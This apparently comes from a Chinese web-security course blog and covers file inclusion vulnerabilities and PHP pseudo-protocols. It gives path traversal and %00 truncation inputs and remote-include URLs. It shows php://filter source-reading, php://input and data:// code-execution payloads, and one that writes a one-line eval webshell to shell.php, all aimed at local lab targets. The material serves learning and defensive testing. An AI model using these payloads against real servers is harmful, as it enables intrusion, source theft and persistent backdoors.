avatar

cindahy

A text-focused Halo theme

  • 首页
  • 文章分类
  • 项目
  • 关于
Home 第31天文件包含,php伪协议
文章

第31天文件包含,php伪协议

Posted 2024-11-27 Updated 2025-08- 17
By Administrator
24~30 min read

文件包含漏洞

原理,检验,类型,利用,修复等

文件包含各个脚本代码

ASP,PHP,JSP,ASPX等

<!--#include file="1.asp" -->
<!--#include file="top.aspx" -->
<c:import url="http://thief.one/1.jsp">
<jsp:include page="hed.jsp"/>
<%@ include file="head.jsp"%>
<?php Include('test.php')?>

根据原网站类型执行脚本文件

本地上传-有限制 无限制

http://127.0.0.1:8080/include.php?filename=1.txt
http://127.0.0.1:8080/include.php?dilename=../../../www.txt
(固定后缀)
%00截断:条件:magic_quotes_gpc=off php版本<5.3.4
filename=../../../www.txt%00
    
长度截断:条件:windows,点号需要长于256;linux长于4096

远程包含-无限制,有限制

php:allow_url_include开关为on,允许远程地址请求,支持远程包含
.....filename=http://www.xiaodi8.com/readme.txt
.....filename=http://www.xiaodi8.com/readme.txt%20
.....filename=http://www.xiaodi8.com/readme.txt%23
.....filename=http://www.xiaodi8.com/readme.txt?

各种协议玩法

https://www.cnblogs.com/endust/p/11804767.html

PHP支持的伪协议

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

php.ini参数设置
在php.ini里有两个重要的参数allow_url_fopen、allow_url_include。

allow_url_fopen:默认值是ON。允许url里的封装协议访问文件;

allow_url_include:默认值是OFF。不允许包含url里的封装协议包含文件;

各协议的利用条件和方法

php://filter参数详解

resource=<要过滤的数据流>

必须项。它指定了你要筛选过滤的数据流。

read=<读链的过滤器>

该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔

write=<写链的筛选列表>

该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔

<; 两个链的过滤器>

任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。

可用的过滤器列表(4类)

字符串过滤器

作用

string.rot13

等同于str_rot13()

,rot13变换

string.toupper

等同于strtoupper()

,转大写字母

string.tolower

等同于strtolower()

,转小写字母

string.strip_tags

等同于strip_tags()

,去除html、PHP语言标签

转换过滤器

作用

convert.base64-encode & convert.base64-decode

等同于base64_encode()

和base64_decode()

,base64编码解码

convert.quoted-printable-encode & convert.quoted-printable-decode

quoted-printable 字符串与 8-bit 字符串编码解码

压缩过滤器

作用

zlib.deflate & zlib.inflate

在本地文件系统中创建 gzip 兼容文件的方法,但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。

bzip2.compress & bzip2.decompress

同上,在本地文件系统中创建 bz2 兼容文件的方法。

加密过滤器

作用

mcrypt.*

libmcrypt 对称加密算法

mdecrypt.*

libmcrypt 对称解密算法

读取文件源码用法
php://filter/read=convert.base64-encode/resource=[文件名]
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
执行php代码用法
php://input + [POST DATA]
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
写入一句话木马用法
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
//把后门代码写入shell.php

data://

数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
 
2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

示例

ctf白盒题

先用大小写判断网站为linux还是windows系统

大小写敏感为linux系统

读取当前文件夹下的文件

继续读取得到flag

效果一样,就绝对是文件操作类的漏洞

cms黑盒

小迪安全web
小迪安全web
License:  CC BY 4.0
Share

Further Reading

Jul 6, 2025

第38天反序列化JAVA

#序列化和反序列化 序列化:将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间, 对象将其当前状态写入到临时或持久性存储区。 反序列化:从存储区中读取数据,并将其还原为对象的过程,称为反序列化。 下方的特征可以作为序列化的标志参考:

Apr 26, 2025

第36天逻辑越权之验证码与Token及接口

#验证码安全 分类:图片,手机或邮箱,语音,视频,操作等 原理;验证生成或验证过程中的逻辑问题 危害:账户权限泄露,短信轰炸,遍历,任意用户操作 漏洞:客户端回显(已讲),验证码复用,,验证码爆破(已讲),绕过等 #token安全 基于上述同理,主要是验证中可存在绕过可继续后续测试 token爆破

Apr 26, 2025

第35天逻辑越权之找回机制及接口安全

#找回重置机制 客户端回显(验证码显示在客户端),Response状态值,验证码爆破,找回流程绕过(抓包跳过验证流程)等 #接口调用乱用 来电轰炸,短信轰炸等 演示案例: 找回密码验证码逻辑-爆破测试-实例 墨者靶场密码重置-验证码套用-靶场 手机号码,新密码和验证码在同一界面, 填写手机号,得

OLDER

user.ini留后门

NEWER

第32天文件下载读取全解

Recently Updated

  • 常见安全产品整理(防火墙,WAF,EDR)
  • ELK从入门到实践
  • bp+mumu模拟器app抓包
  • xray漏扫工具
  • Java反序列化-RMI的几种攻击方式

Trending Tags

安全运营 文件上传 php反序列化 xss csrf ssrf xxe sql php 白帽子讲web安全

Contents

©2025 cindahy. Some rights reserved.

Using the Halo theme Chirpy